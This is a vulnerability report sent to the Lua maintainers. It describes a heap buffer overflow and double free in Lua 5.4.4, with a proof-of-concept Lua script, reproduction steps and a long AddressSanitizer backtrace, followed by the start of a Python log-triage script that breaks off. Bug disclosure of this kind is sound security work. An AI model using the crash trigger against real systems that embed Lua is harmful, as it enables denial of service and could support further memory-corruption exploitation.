Hello,

I found a heap buffer overflow which can cause a heap double free error.

Lua version: Lua 5.4.4 Copyright (C) 1994-2022 Lua.org, PUC-Rio
Latest commit: 8426d9b4d4df1da3c5b2d759e509ae1c50a86667
Platform: Ubuntu-20.04 x86_64
Glibc version: GLIBC 2.31-0ubuntu9.9

POC:
---------------
#poc.lua
print(
  xpcall((0),
    function(...)
      local f
      if d[print(print(print(print(t[...]))))] then
      end
    end
  )
)
---------------

How to reproduce:
---------------
1. git clone https://github.com/lua/lua
2. cd lua && make
3. ./lua ./poc.lua
---------------

Error message:
---------------
double free or corruption (!prev)
[1] 49704 abort (core dumped) ./lua ./poc.lua
---------------

Address Sanitizer log: see **attachment.txt**

I apologise for putting the ASan logs directly into the body of the email in the previous mail, which made the body too large to view. I have now put them into an attachment file.

And the stack backtrace is recursive, so this could be an error that occurs during some recursive processes.

Found by: Jinwei Dong

=================================================================
==49759==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x62e00000a450 at pc 0x55555557e6c6 bp 0x7ffffff42760 sp 0x7ffffff42750
WRITE of size 8 at 0x62e00000a450 thread T0
#0 0x55555557e6c5 in luaG_errormsg /home/eqqie/work/lua-5.4.4/src/ldebug.c:810
#1 0x55555557eb96 in luaG_runerror /home/eqqie/work/lua-5.4.4/src/ldebug.c:829
#2 0x5555555a618e in luaE_checkcstack /home/eqqie/work/lua-5.4.4/src/lstate.c:167
#3 0x55555558357a in ccall /home/eqqie/work/lua-5.4.4/src/ldo.c:606
#4 0x5555555836a5 in luaD_callnoyield /home/eqqie/work/lua-5.4.4/src/ldo.c:627
#5 0x55555557e87c in luaG_errormsg /home/eqqie/work/lua-5.4.4/src/ldebug.c:813
#6 0x55555557eb96 in luaG_runerror /home/eqqie/work/lua-5.4.4/src/ldebug.c:829
#7 0x55555557de2a in typeerror /home/eqqie/work/lua-5.4.4/src/ldebug.c:725
#8 0x55555557de75 in luaG_typeerror /home/eqqie/work/lua-5.4.4/src/ldebug.c:734
#9 0x5555555b612b in luaV_finishget /home/eqqie/work/lua-5.4.4/src/lvm.c:296
#10 0x5555555bd340 in luaV_execute /home/eqqie/work/lua-5.4.4/src/lvm.c:1257
#11 0x5555555835f3 in ccall /home/eqqie/work/lua-5.4.4/src/ldo.c:609
#12 0x5555555836a5 in luaD_callnoyield /home/eqqie/work/lua-5.4.4/src/ldo.c:627
#13 0x55555557e87c in luaG_errormsg /home/eqqie/work/lua-5.4.4/src/ldebug.c:813
#14 0x55555557eb96 in luaG_runerror /home/eqqie/work/lua-5.4.4/src/ldebug.c:829
#15 0x55555557de2a in typeerror /home/eqqie/work/lua-5.4.4/src/ldebug.c:725
#16 0x55555557de75 in luaG_typeerror /home/eqqie/work/lua-5.4.4/src/ldebug.c:734
#17 0x5555555b612b in luaV_finishget /home/eqqie/work/lua-5.4.4/src/lvm.c:296
#18 0x5555555bd340 in luaV_execute /home/eqqie/work/lua-5.4.4/src/lvm.c:1257
#19 0x5555555835f3 in ccall /home/eqqie/work/lua-5.4.4/src/ldo.c:609
#20 0x5555555836a5 in luaD_callnoyield /home/eqqie/work/lua-5.4.4/src/ldo.c:627
#21 0x55555557e87c in luaG_errormsg /home/eqqie/work/lua-5.4.4/src/ldebug.c:813
#22 0x55555557eb96 in luaG_runerror /home/eqqie/work/lua-5.4.4/src/ldebug.c:829
#23 0x55555557de2a in typeerror /home/eqqie/work/lua-5.4.4/src/ldebug.c:725
#24 0x55555557de75 in luaG_typeerror /home/eqqie/work/lua-5.4.4/src/ldebug.c:734
#25 0x5555555b612b in luaV_finishget /home/eqqie/work/lua-5.4.4/src/lvm.c:296
#26 0x5555555bd340 in luaV_execute /home/eqqie/work/lua-5.4.4/src/lvm.c:1257
#27 0x5555555835f3 in ccall /home/eqqie/work/lua-5.4.4/src/ldo.c:609
#28 0x5555555836a5 in luaD_callnoyield /home/eqqie/work/lua-5.4.4/src/ldo.c:627
#29 0x55555557e87c in luaG_errormsg /home/eqqie/work/lua-5.4.4/src/ldebug.c:813
#30 0x55555557eb96 in luaG_runerror /home/eqqie/work/lua-5.4.4/src/ldebug.c:829
#31 0x55555557de2a in typeerror /home/eqqie/work/lua-5.4.4/src/ldebug.c:725
#32 0x55555557de75 in luaG_typeerror /home/eqqie/work/lua-5.4.4/src/ldebug.c:734
#33 0x5555555b612b in luaV_finishget /home/eqqie/work/lua-5.4.4/src/lvm.c:296
#34 0x5555555bd340 in luaV_execute /home/eqqie/work/lua-5.4.4/src/lvm.c:1257
#35 0x5555555835f3 in ccall /home/eqqie/work/lua-5.4.4/src/ldo.c:609
#36 0x5555555836a5 in luaD_callnoyield /home/eqqie/work/lua-5.4.4/src/ldo.c:627
#37 0x55555557e87c in luaG_errormsg /home/eqqie/work/lua-5.4.4/src/ldebug.c:813
#38 0x55555557eb96 in luaG_runerror /home/eqqie/work/lua-5.4.4/src/ldebug.c:829
#39 0x55555557de2a in typeerror /home/eqqie/work/lua-5.4.4/src/ldebug.c:725
#40 0x55555557de75 in luaG_typeerror /home/eqqie/work/lua-5.4.4/src/ldebug.c:734
#41 0x5555555b612b in luaV_finishget /home/eqqie/work/lua-5.4.4/src/lvm.c:296
#42 0x5555555bd340 in luaV_execute /home/eqqie/work/lua-5.4.4/src/lvm.c:1257
#43 0x5555555835f3 in ccall /home/eqqie/work/lua-5.4.4/src/ldo.c:609
#44 0x5555555836a5 in luaD_callnoyield /home/eqqie/work/lua-5.4.4/src/ldo.c:627
#45 0x55555557e87c in luaG_errormsg /home/eqqie/work/lua-5.4.4/src/ldebug.c:813
#46 0x55555557eb96 in luaG_runerror /home/eqqie/work/lua-5.4.4/src/ldebug.c:829
#47 0x55555557de2a in typeerror /home/eqqie/work/lua-5.4.4/src/ldebug.c:725
#48 0x55555557de75 in luaG_typeerror /home/eqqie/work/lua-5.4.4/src/ldebug.c:734
#49 0x5555555b612b in luaV_finishget /home/eqqie/work/lua-5.4.4/src/lvm.c:296
#50 0x5555555bd340 in luaV_execute /home/eqqie/work/lua-5.4.4/src/lvm.c:1257
#51 0x5555555835f3 in ccall /home/eqqie/work/lua-5.4.4/src/ldo.c:609
#52 0x5555555836a5 in luaD_callnoyield /home/eqqie/work/lua-5.4.4/src/ldo.c:627
#53 0x55555557e87c in luaG_errormsg /home/eqqie/work/lua-5.4.4/src/ldebug.c:813
#54 0x55555557eb96 in luaG_runerror /home/eqqie/work/lua-5.4.4/src/ldebug.c:829
#55 0x55555557de2a in typeerror /home/eqqie/work/lua-5.4.4/src/ldebug.c:725
#56 0x55555557de75 in luaG_typeerror /home/eqqie/work/lua-5.4.4/src/ldebug.c:734
#57 0x5555555b612b in luaV_finishget /home/eqqie/work/lua-5.4.4/src/lvm.c:296
#58 0x5555555bd340 in luaV_execute /home/eqqie/work/lua-5.4.4/src/lvm.c:1257
#59 0x5555555835f3 in ccall /home/eqqie/work/lua-5.4.4/src/ldo.c:609
#60 0x5555555836a5 in luaD_callnoyield /home/eqqie/work/lua-5.4.4/src/ldo.c:627
#61 0x55555557e87c in luaG_errormsg /home/eqqie/work/lua-5.4.4/src/ldebug.c:813
#62 0x55555557eb96 in luaG_runerror /home/eqqie/work/lua-5.4.4/src/ldebug.c:829
#63 0x55555557de2a in typeerror /home/eqqie/work/lua-5.4.4/src/ldebug.c:725
#64 0x55555557de75 in luaG_typeerror /home/eqqie/work/lua-5.4.4/src/ldebug.c:734
#65 0x5555555b612b in luaV_finishget /home/eqqie/work/lua-5.4.4/src/lvm.c:296
#66 0x5555555bd340 in luaV_execute /home/eqqie/work/lua-5.4.4/src/lvm.c:1257
#67 0x5555555835f3 in ccall /home/eqqie/work/lua-5.4.4/src/ldo.c:609
#68 0x5555555836a5 in luaD_callnoyield /home/eqqie/work/lua-5.4.4/src/ldo.c:627
#69 0x55555557e87c in luaG_errormsg /home/eqqie/work/lua-5.4.4/src/ldebug.c:813
#70 0x55555557eb96 in luaG_runerror /home/eqqie/work/lua-5.4.4/src/ldebug.c:829
#71 0x55555557de2a in typeerror /home/eqqie/work/lua-5.4.4/src/ldebug.c:725
#72 0x55555557de75 in luaG_typeerror /home/eqqie/work/lua-5.4.4/src/ldebug.c:734
#73 0x5555555b612b in luaV_finishget /home/eqqie/work/lua-5.4.4/src/lvm.c:296
#74 0x5555555bd340 in luaV_execute /home/eqqie/work/lua-5.4.4/src/lvm.c:1257
#75 0x5555555835f3 in ccall /home/eqqie/work/lua-5.4.4/src/ldo.c:609
#76 0x5555555836a5 in luaD_callnoyield /home/eqqie/work/lua-5.4.4/src/ldo.c:627
#77 0x55555557e87c in luaG_errormsg /home/eqqie/work/lua-5.4.4/src/ldebug.c:813
#78 0x55555557eb96 in luaG_runerror /home/eqqie/work/lua-5.4.4/src/ldebug.c:829
#79 0x55555557de2a in typeerror /home/eqqie/work/lua-5.4.4/src/ldebug.c:725
#80 0x55555557de75 in luaG_typeerror /home/eqqie/work/lua-5.4.4/src/ldebug.c:734
#81 0x5555555b612b in luaV_finishget /home/eqqie/work/lua-5.4.4/src/lvm.c:296
#82 0x5555555bd340 in luaV_execute /home/eqqie/work/lua-5.4.4/src/lvm.c:1257
#83 0x5555555835f3 in ccall /home/eqqie/work/lua-5.4.4/src/ldo.c:609
#84 0x5555555836a5 in luaD_callnoyield /home/eqqie/work/lua-5.4.4/src/ldo.c:627
#85 0x55555557e87c in luaG_errormsg /home/eqqie/work/lua-5.4.4/src/ldebug.c:813
#86 0x55555557eb96 in luaG_runerror /home/eqqie/work/lua-5.4.4/src/ldebug.c:829
#87 0x55555557de2a in typeerror /home/eqqie/work/lua-5.4.4/src/ldebug.c:725
#88 0x55555557de75 in luaG_typeerror /home/eqqie/work/lua-5.4.4/src/ldebug.c:734
#89 0x5555555b612b in luaV_finishget /home/eqqie/work/lua-5.4.4/src/lvm.c:296
#90 0x5555555bd340 in luaV_execute /home/eqqie/work/lua-5.4.4/src/lvm.c:1257
#91 0x5555555835f3 in ccall /home/eqqie/work/lua-5.4.4/src/ldo.c:609
#92 0x5555555836a5 in luaD_callnoyield /home/eqqie/work/lua-5.4.4/src/ldo.c:627
#93 0x55555557e87c in luaG_errormsg /home/eqqie/work/lua-5.4.4/src/ldebug.c:813
#94 0x55555557eb96 in luaG_runerror /home/eqqie/work/lua-5.4.4/src/ldebug.c:829
#95 0x55555557de2a in typeerror /home/eqqie/work/lua-5.4.4/src/ldebug.c:725
#96 0x55555557de75 in luaG_typeerror /home/eqqie/work/lua-5.4.4/src/ldebug.c:734
#97 0x5555555b612b in luaV_finishget /home/eqqie/work/lua-5.4.4/src/lvm.c:296
#98 0x5555555bd340 in luaV_execute /home/eqqie/work/lua-5.4.4/src/lvm.c:1257
#99 0x5555555835f3 in ccall /home/eqqie/work/lua-5.4.4/src/ldo.c:609
#100 0x5555555836a5 in luaD_callnoyield /home/eqqie/work/lua-5.4.4/src/ldo.c:627
#101 0x55555557e87c in luaG_errormsg /home/eqqie/work/lua-5.4.4/src/ldebug.c:813
#102 0x55555557eb96 in luaG_runerror /home/eqqie/work/lua-5.4.4/src/ldebug.c:829
#103 0x55555557de2a in typeerror /home/eqqie/work/lua-5.4.4/src/ldebug.c:725
#104 0x55555557de75 in luaG_typeerror /home/eqqie/work/lua-5.4.4/src/ldebug.c:734
#105 0x5555555b612b in luaV_finishget /home/eqqie/work/lua-5.4.4/src/lvm.c:296
#106 0x5555555bd340 in luaV_execute /home/eqqie/work/lua-5.4.4/src/lvm.c:1257
#107 0x5555555835f3 in ccall /home/eqqie/work/lua-5.4.4/src/ldo.c:609
#108 0x5555555836a5 in luaD_callnoyield /home/eqqie/work/lua-5.4.4/src/ldo.c:627
#109 0x55555557e87c in luaG_errormsg /home/eqqie/work/lua-5.4.4/src/ldebug.c:813
#110 0x55555557eb96 in luaG_runerror /home/eqqie/work/lua-5.4.4/src/ldebug.c:829
#111 0x55555557de2a in typeerror /home/eqqie/work/lua-5.4.4/src/ldebug.c:725
#112 0x55555557de75 in luaG_typeerror /home/eqqie/work/lua-5.4.4/src/ldebug.c:734
#113 0x5555555b612b in luaV_finishget /home/eqqie/work/lua-5.4.4/src/lvm.c:296
#114 0x5555555bd340 in luaV_execute /home/eqqie/work/lua-5.4.4/src/lvm.c:1257
#115 0x5555555835f3 in ccall /home/eqqie/work/lua-5.4.4/src/ldo.c:609
#116 0x5555555836a5 in luaD_callnoyield /home/eqqie/work/lua-5.4.4/src/ldo.c:627
#117 0x55555557e87c in luaG_errormsg /home/eqqie/work/lua-5.4.4/src/ldebug.c:813
#118 0x55555557eb96 in luaG_runerror /home/eqqie/work/lua-5.4.4/src/ldebug.c:829
#119 0x55555557de2a in typeerror /home/eqqie/work/lua-5.4.4/src/ldebug.c:725
#120 0x55555557de75 in luaG_typeerror /home/eqqie/work/lua-5.4.4/src/ldebug.c:734
#121 0x5555555b612b in luaV_finishget /home/eqqie/work/lua-5.4.4/src/lvm.c:296
#122 0x5555555bd340 in luaV_execute /home/eqqie/work/lua-5.4.4/src/lvm.c:1257
#123 0x5555555835f3 in ccall /home/eqqie/work/lua-5.4.4/src/ldo.c:609
#124 0x5555555836a5 in luaD_callnoyield /home/eqqie/work/lua-5.4.4/src/ldo.c:627
#125 0x55555557e87c in luaG_errormsg /home/eqqie/work/lua-5.4.4/src/ldebug.c:813
#126 0x55555557eb96 in luaG_runerror /home/eqqie/work/lua-5.4.4/src/ldebug.c:829
#127 0x55555557de2a in typeerror /home/eqqie/work/lua-5.4.4/src/ldebug.c:725
#128 0x55555557de75 in luaG_typeerror /home/eqqie/work/lua-5.4.4/src/ldebug.c:734
#129 0x5555555b612b in luaV_finishget /home/eqqie/work/lua-5.4.4/src/lvm.c:296
#130 0x5555555bd340 in luaV_execute /home/eqqie/work/lua-5.4.4/src/lvm.c:1257
#131 0x5555555835f3 in ccall /home/eqqie/work/lua-5.4.4/src/ldo.c:609
#132 0x5555555836a5 in luaD_callnoyield /home/eqqie/work/lua-5.4.4/src/ldo.c:627
#133 0x55555557e87c in luaG_errormsg /home/eqqie/work/lua-5.4.4/src/ldebug.c:813
#134 0x55555557eb96 in luaG_runerror /home/eqqie/work/lua-5.4.4/src/ldebug.c:829
#135 0x55555557de2a in typeerror /home/eqqie/work/lua-5.4.4/src/ldebug.c:725
#136 0x55555557de75 in luaG_typeerror /home/eqqie/work/lua-5.4.4/src/ldebug.c:734
#137 0x5555555b612b in luaV_finishget /home/eqqie/work/lua-5.4.4/src/lvm.c:296
#138 0x5555555bd340 in luaV_execute /home/eqqie/work/lua-5.4.4/src/lvm.c:1257
#139 0x5555555835f3 in ccall /home/eqqie/work/lua-5.4.4/src/ldo.c:609
#140 0x5555555836a5 in luaD_callnoyield /home/eqqie/work/lua-5.4.4/src/ldo.c:627
#141 0x55555557e87c in luaG_errormsg /home/eqqie/work/lua-5.4.4/src/ldebug.c:813
#142 0x55555557eb96 in luaG_runerror /home/eqqie/work/lua-5.4.4/src/ldebug.c:829
#143 0x55555557de2a in typeerror /home/eqqie/work/lua-5.4.4/src/ldebug.c:725
#144 0x55555557de75 in luaG_typeerror /home/eqqie/work/lua-5.4.4/src/ldebug.c:734
#145 0x5555555b612b in luaV_finishget /home/eqqie/work/lua-5.4.4/src/lvm.c:296
#146 0x5555555bd340 in luaV_execute /home/eqqie/work/lua-5.4.4/src/lvm.c:1257
#147 0x5555555835f3 in ccall /home/eqqie/work/lua-5.4.4/src/ldo.c:609
#148 0x5555555836a5 in luaD_callnoyield /home/eqqie/work/lua-5.4.4/src/ldo.c:627
#149 0x55555557e87c in luaG_errormsg /home/eqqie/work/lua-5.4.4/src/ldebug.c:813
#150 0x55555557eb96 in luaG_runerror /home/eqqie/work/lua-5.4.4/src/ldebug.c:829
#151 0x55555557de2a in typeerror /home/eqqie/work/lua-5.4.4/src/ldebug.c:725
#152 0x55555557de75 in luaG_typeerror /home/eqqie/work/lua-5.4.4/src/ldebug.c:734
#153 0x5555555b612b in luaV_finishget /home/eqqie/work/lua-5.4.4/src/lvm.c:296
#154 0x5555555bd340 in luaV_execute /home/eqqie/work/lua-5.4.4/src/lvm.c:1257
#155 0x5555555835f3 in ccall /home/eqqie/work/lua-5.4.4/src/ldo.c:609
#156 0x5555555836a5 in luaD_callnoyield /home/eqqie/work/lua-5.4.4/src/ldo.c:627
#157 0x55555557e87c in luaG_errormsg /home/eqqie/work/lua-5.4.4/src/ldebug.c:813
#158 0x55555557eb96 in luaG_runerror /home/eqqie/work/lua-5.4.4/src/ldebug.c:829
#159 0x55555557de2a in typeerror /home/eqqie/work/lua-5.4.4/src/ldebug.c:725
#160 0x55555557de75 in luaG_typeerror /home/eqqie/work/lua-5.4.4/src/ldebug.c:734
#161 0x5555555b612b in luaV_finishget /home/eqqie/work/lua-5.4.4/src/lvm.c:296
#162 0x5555555bd340 in luaV_execute /home/eqqie/work/lua-5.4.4/src/lvm.c:1257
#163 0x5555555835f3 in ccall /home/eqqie/work/lua-5.4.4/src/ldo.c:609
#164 0x5555555836a5 in luaD_callnoyield /home/eqqie/work/lua-5.4.4/src/ldo.c:627
#165 0x55555557e87c in luaG_errormsg /home/eqqie/work/lua-5.4.4/src/ldebug.c:813
#166 0x55555557eb96 in luaG_runerror /home/eqqie/work/lua-5.4.4/src/ldebug.c:829
#167 0x55555557de2a in typeerror /home/eqqie/work/lua-5.4.4/src/ldebug.c:725
#168 0x55555557de75 in luaG_typeerror /home/eqqie/work/lua-5.4.4/src/ldebug.c:734
#169 0x5555555b612b in luaV_finishget /home/eqqie/work/lua-5.4.4/src/lvm.c:296
#170 0x5555555bd340 in luaV_execute /home/eqqie/work/lua-5.4.4/src/lvm.c:1257
#171 0x5555555835f3 in ccall /home/eqqie/work/lua-5.4.4/src/ldo.c:609
#172 0x5555555836a5 in luaD_callnoyield /home/eqqie/work/lua-5.4.4/src/ldo.c:627
#173 0x55555557e87c in luaG_errormsg /home/eqqie/work/lua-5.4.4/src/ldebug.c:813
#174 0x55555557eb96 in luaG_runerror /home/eqqie/work/lua-5.4.4/src/ldebug.c:829
#175 0x55555557de2a in typeerror /home/eqqie/work/lua-5.4.4/src/ldebug.c:725
#176 0x55555557de75 in luaG_typeerror /home/eqqie/work/lua-5.4.4/src/ldebug.c:734
#177 0x5555555b612b in luaV_finishget /home/eqqie/work/lua-5.4.4/src/lvm.c:296
#178 0x5555555bd340 in luaV_execute /home/eqqie/work/lua-5.4.4/src/lvm.c:1257
#179 0x5555555835f3 in ccall /home/eqqie/work/lua-5.4.4/src/ldo.c:609
#180 0x5555555836a5 in luaD_callnoyield /home/eqqie/work/lua-5.4.4/src/ldo.c:627
#181 0x55555557e87c in luaG_errormsg /home/eqqie/work/lua-5.4.4/src/ldebug.c:813
#182 0x55555557eb96 in luaG_runerror /home/eqqie/work/lua-5.4.4/src/ldebug.c:829
#183 0x55555557de2a in typeerror /home/eqqie/work/lua-5.4.4/src/ldebug.c:725
#184 0x55555557de75 in luaG_typeerror /home/eqqie/work/lua-5.4.4/src/ldebug.c:734
#185 0x5555555b612b in luaV_finishget /home/eqqie/work/lua-5.4.4/src/lvm.c:296
#186 0x5555555bd340 in luaV_execute /home/eqqie/work/lua-5.4.4/src/lvm.c:1257
#187 0x5555555835f3 in ccall /home/eqqie/work/lua-5.4.4/src/ldo.c:609
#188 0x5555555836a5 in luaD_callnoyield /home/eqqie/work/lua-5.4.4/src/ldo.c:627
#189 0x55555557e87c in luaG_errormsg /home/eqqie/work/lua-5.4.4/src/ldebug.c:813
#190 0x55555557eb96 in luaG_runerror /home/eqqie/work/lua-5.4.4/src/ldebug.c:829
#191 0x55555557de2a in typeerror /home/eqqie/work/lua-5.4.4/src/ldebug.c:725
#192 0x55555557de75 in luaG_typeerror /home/eqqie/work/lua-5.4.4/src/ldebug.c:734
#193 0x5555555b612b in luaV_finishget /home/eqqie/work/lua-5.4.4/src/lvm.c:296
#194 0x5555555bd340 in luaV_execute /home/eqqie/work/lua-5.4.4/src/lvm.c:1257
#195 0x5555555835f3 in ccall /home/eqqie/work/lua-5.4.4/src/ldo.c:609
#196 0x5555555836a5 in luaD_callnoyield /home/eqqie/work/lua-5.4.4/src/ldo.c:627
#197 0x55555557e87c in luaG_errormsg /home/eqqie/work/lua-5.4.4/src/ldebug.c:813
#198 0x55555557eb96 in luaG_runerror /home/eqqie/work/lua-5.4.4/src/ldebug.c:829
#199 0x55555557de2a in typeerror /home/eqqie/work/lua-5.4.4/src/ldebug.c:725
#200 0x55555557de75 in luaG_typeerror /home/eqqie/work/lua-5.4.4/src/ldebug.c:734
#201 0x5555555b612b in luaV_finishget /home/eqqie/work/lua-5.4.4/src/lvm.c:296
#202 0x5555555bd340 in luaV_execute /home/eqqie/work/lua-5.4.4/src/lvm.c:1257
#203 0x5555555835f3 in ccall /home/eqqie/work/lua-5.4.4/src/ldo.c:609
#204 0x5555555836a5 in luaD_callnoyield /home/eqqie/work/lua-5.4.4/src/ldo.c:627
#205 0x55555557e87c in luaG_errormsg /home/eqqie/work/lua-5.4.4/src/ldebug.c:813
#206 0x55555557eb96 in luaG_runerror /home/eqqie/work/lua-5.4.4/src/ldebug.c:829
#207 0x55555557de2a in typeerror /home/eqqie/work/lua-5.4.4/src/ldebug.c:725
#208 0x55555557de75 in luaG_typeerror /home/eqqie/work/lua-5.4.4/src/ldebug.c:734
#209 0x5555555b612b in luaV_finishget /home/eqqie/work/lua-5.4.4/src/lvm.c:296
#210 0x5555555bd340 in luaV_execute /home/eqqie/work/lua-5.4.4/src/lvm.c:1257
#211 0x5555555835f3 in ccall /home/eqqie/work/lua-5.4.4/src/ldo.c:609
#212 0x5555555836a5 in luaD_callnoyield /home/eqqie/work/lua-5.4.4/src/ldo.c:627
#213 0x55555557e87c in luaG_errormsg /home/eqqie/work/lua-5.4.4/src/ldebug.c:813
#214 0x55555557eb96 in luaG_runerror /home/eqqie/work/lua-5.4.4/src/ldebug.c:829
#215 0x55555557de2a in typeerror /home/eqqie/work/lua-5.4.4/src/ldebug.c:725
#216 0x55555557de75 in luaG_typeerror /home/eqqie/work/lua-5.4.4/src/ldebug.c:734
#217 0x5555555b612b in luaV_finishget /home/eqqie/work/lua-5.4.4/src/lvm.c:296
#218 0x5555555bd340 in luaV_execute /home/eqqie/work/lua-5.4.4/src/lvm.c:1257
#219 0x5555555835f3 in ccall /home/eqqie/work/lua-5.4.4/src/ldo.c:609
#220 0x5555555836a5 in luaD_callnoyield /home/eqqie/work/lua-5.4.4/src/ldo.c:627
#221 0x55555557e87c in luaG_errormsg /home/eqqie/work/lua-5.4.4/src/ldebug.c:813
#222 0x55555557eb96 in luaG_runerror /home/eqqie/work/lua-5.4.4/src/ldebug.c:829
#223 0x55555557de2a in typeerror /home/eqqie/work/lua-5.4.4/src/ldebug.c:725
#224 0x55555557de75 in luaG_typeerror /home/eqqie/work/lua-5.4.4/src/ldebug.c:734
#225 0x5555555b612b in luaV_finishget /home/eqqie/work/lua-5.4.4/src/lvm.c:296
#226 0x5555555bd340 in luaV_execute /home/eqqie/work/lua-5.4.4/src/lvm.c:1257
#227 0x5555555835f3 in ccall /home/eqqie/work/lua-5.4.4/src/ldo.c:609
#228 0x5555555836a5 in luaD_callnoyield /home/eqqie/work/lua-5.4.4/src/ldo.c:627
#229 0x55555557e87c in luaG_errormsg /home/eqqie/work/lua-5.4.4/src/ldebug.c:813
#230 0x55555557eb96 in luaG_runerror /home/eqqie/work/lua-5.4.4/src/ldebug.c:829
#231 0x55555557de2a in typeerror /home/eqqie/work/lua-5.4.4/src/ldebug.c:725
#232 0x55555557de75 in luaG_typeerror /home/eqqie/work/lua-5.4.4/src/ldebug.c:734
#233 0x5555555b612b in luaV_finishget /home/eqqie/work/lua-5.4.4/src/lvm.c:296
#234 0x5555555bd340 in luaV_execute /home/eqqie/work/lua-5.4.4/src/lvm.c:1257
#235 0x5555555835f3 in ccall /home/eqqie/work/lua-5.4.4/src/ldo.c:609
#236 0x5555555836a5 in luaD_callnoyield /home/eqqie/work/lua-5.4.4/src/ldo.c:627
#237 0x55555557e87c in luaG_errormsg /home/eqqie/work/lua-5.4.4/src/ldebug.c:813
#238 0x55555557eb96 in luaG_runerror /home/eqqie/work/lua-5.4.4/src/ldebug.c:829
#239 0x55555557de2a in typeerror /home/eqqie/work/lua-5.4.4/src/ldebug.c:725
#240 0x55555557de75 in luaG_typeerror /home/eqqie/work/lua-5.4.4/src/ldebug.c:734
#241 0x5555555b612b in luaV_finishget /home/eqqie/work/lua-5.4.4/src/lvm.c:296
#242 0x5555555bd340 in luaV_execute /home/eqqie/work/lua-5.4.4/src/lvm.c:1257
#243 0x5555555835f3 in ccall /home/eqqie/work/lua-5.4.4/src/ldo.c:609
#244 0x5555555836a5 in luaD_callnoyield /home/eqqie/work/lua-5.4.4/src/ldo.c:627
#245 0x55555557e87c in luaG_errormsg /home/eqqie/work/lua-5.4.4/src/ldebug.c:813
#246 0x55555557eb96 in luaG_runerror /home/eqqie/work/lua-5.4.4/src/ldebug.c:829
#247 0x55555557de2a in typeerror /home/eqqie/work/lua-5.4.4/src/ldebug.c:725
#248 0x55555557de75 in luaG_typeerror /home/eqqie/work/lua-5.4.4/src/ldebug.c:734
#249 0x5555555b612b in luaV_finishget /home/eqqie/work/lua-5.4.4/src/lvm.c:296
#250 0x5555555bd340 in luaV_execute /home/eqqie/work/lua-5.4.4/src/lvm.c:1257
0x62e00000a450 is located 0 bytes to the right of 41040-byte region [0x62e000000400,0x62e00000a450)
allocated by thread T0 here:
#0 0x7ffff7681c3e in __interceptor_realloc ../../../../src/libsanitizer/asan/asan_malloc_linux.cc:163
#1 0x5555555d43c5 in l_alloc /home/eqqie/work/lua-5.4.4/src/lauxlib.c:1018
#2 0x55555559347b in luaM_realloc_ /home/eqqie/work/lua-5.4.4/src/lmem.c:166
#3 0x555555580249 in luaD_reallocstack /home/eqqie/work/lua-5.4.4/src/ldo.c:194
#4 0x5555555805a8 in luaD_growstack /home/eqqie/work/lua-5.4.4/src/ldo.c:238
#5 0x555555583353 in luaD_precall /home/eqqie/work/lua-5.4.4/src/ldo.c:580
#6 0x555555583590 in ccall /home/eqqie/work/lua-5.4.4/src/ldo.c:607
#7 0x5555555836a5 in luaD_callnoyield /home/eqqie/work/lua-5.4.4/src/ldo.c:627
#8 0x55555557e87c in luaG_errormsg /home/eqqie/work/lua-5.4.4/src/ldebug.c:813
#9 0x55555557eb96 in luaG_runerror /home/eqqie/work/lua-5.4.4/src/ldebug.c:829
#10 0x55555557de2a in typeerror /home/eqqie/work/lua-5.4.4/src/ldebug.c:725
#11 0x55555557de75 in luaG_typeerror /home/eqqie/work/lua-5.4.4/src/ldebug.c:734
#12 0x5555555b612b in luaV_finishget /home/eqqie/work/lua-5.4.4/src/lvm.c:296
#13 0x5555555bd340 in luaV_execute /home/eqqie/work/lua-5.4.4/src/lvm.c:1257
#14 0x5555555835f3 in ccall /home/eqqie/work/lua-5.4.4/src/ldo.c:609
#15 0x5555555836a5 in luaD_callnoyield /home/eqqie/work/lua-5.4.4/src/ldo.c:627
#16 0x55555557e87c in luaG_errormsg /home/eqqie/work/lua-5.4.4/src/ldebug.c:813
#17 0x55555557eb96 in luaG_runerror /home/eqqie/work/lua-5.4.4/src/ldebug.c:829
#18 0x55555557de2a in typeerror /home/eqqie/work/lua-5.4.4/src/ldebug.c:725
#19 0x55555557de75 in luaG_typeerror /home/eqqie/work/lua-5.4.4/src/ldebug.c:734
#20 0x5555555b612b in luaV_finishget /home/eqqie/work/lua-5.4.4/src/lvm.c:296
#21 0x5555555bd340 in luaV_execute /home/eqqie/work/lua-5.4.4/src/lvm.c:1257
#22 0x5555555835f3 in ccall /home/eqqie/work/lua-5.4.4/src/ldo.c:609
#23 0x5555555836a5 in luaD_callnoyield /home/eqqie/work/lua-5.4.4/src/ldo.c:627
#24 0x55555557e87c in luaG_errormsg /home/eqqie/work/lua-5.4.4/src/ldebug.c:813
#25 0x55555557eb96 in luaG_runerror /home/eqqie/work/lua-5.4.4/src/ldebug.c:829
#26 0x55555557de2a in typeerror /home/eqqie/work/lua-5.4.4/src/ldebug.c:725
#27 0x55555557de75 in luaG_typeerror /home/eqqie/work/lua-5.4.4/src/ldebug.c:734
#28 0x5555555b612b in luaV_finishget /home/eqqie/work/lua-5.4.4/src/lvm.c:296
#29 0x5555555bd340 in luaV_execute /home/eqqie/work/lua-5.4.4/src/lvm.c:1257
SUMMARY: AddressSanitizer: heap-buffer-overflow /home/eqqie/work/lua-5.4.4/src/ldebug.c:810 in luaG_errormsg
==49759==ABORTING
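
The recursion the reporter notes in the backtrace can be confirmed mechanically when triaging a report like this one. The following is an added example, not part of the original post or of the Lua project: a Python script that collapses an AddressSanitizer backtrace into its non-repeating prefix and one repeating cycle. `SAMPLE` holds frames #0 to #20 copied from the report above; the names `parse_frames`, `find_cycle` and `summarize` are hypothetical.

```python
import re

# One AddressSanitizer frame: "#N 0xPC in function /path/file.c:line"
FRAME_RE = re.compile(r"^#(\d+) 0x[0-9a-f]+ in (\S+) (\S+):(\d+)$")

# Frames #0-#20 of the WRITE backtrace, copied from the report on this page.
SAMPLE = """\
#0 0x55555557e6c5 in luaG_errormsg /home/eqqie/work/lua-5.4.4/src/ldebug.c:810
#1 0x55555557eb96 in luaG_runerror /home/eqqie/work/lua-5.4.4/src/ldebug.c:829
#2 0x5555555a618e in luaE_checkcstack /home/eqqie/work/lua-5.4.4/src/lstate.c:167
#3 0x55555558357a in ccall /home/eqqie/work/lua-5.4.4/src/ldo.c:606
#4 0x5555555836a5 in luaD_callnoyield /home/eqqie/work/lua-5.4.4/src/ldo.c:627
#5 0x55555557e87c in luaG_errormsg /home/eqqie/work/lua-5.4.4/src/ldebug.c:813
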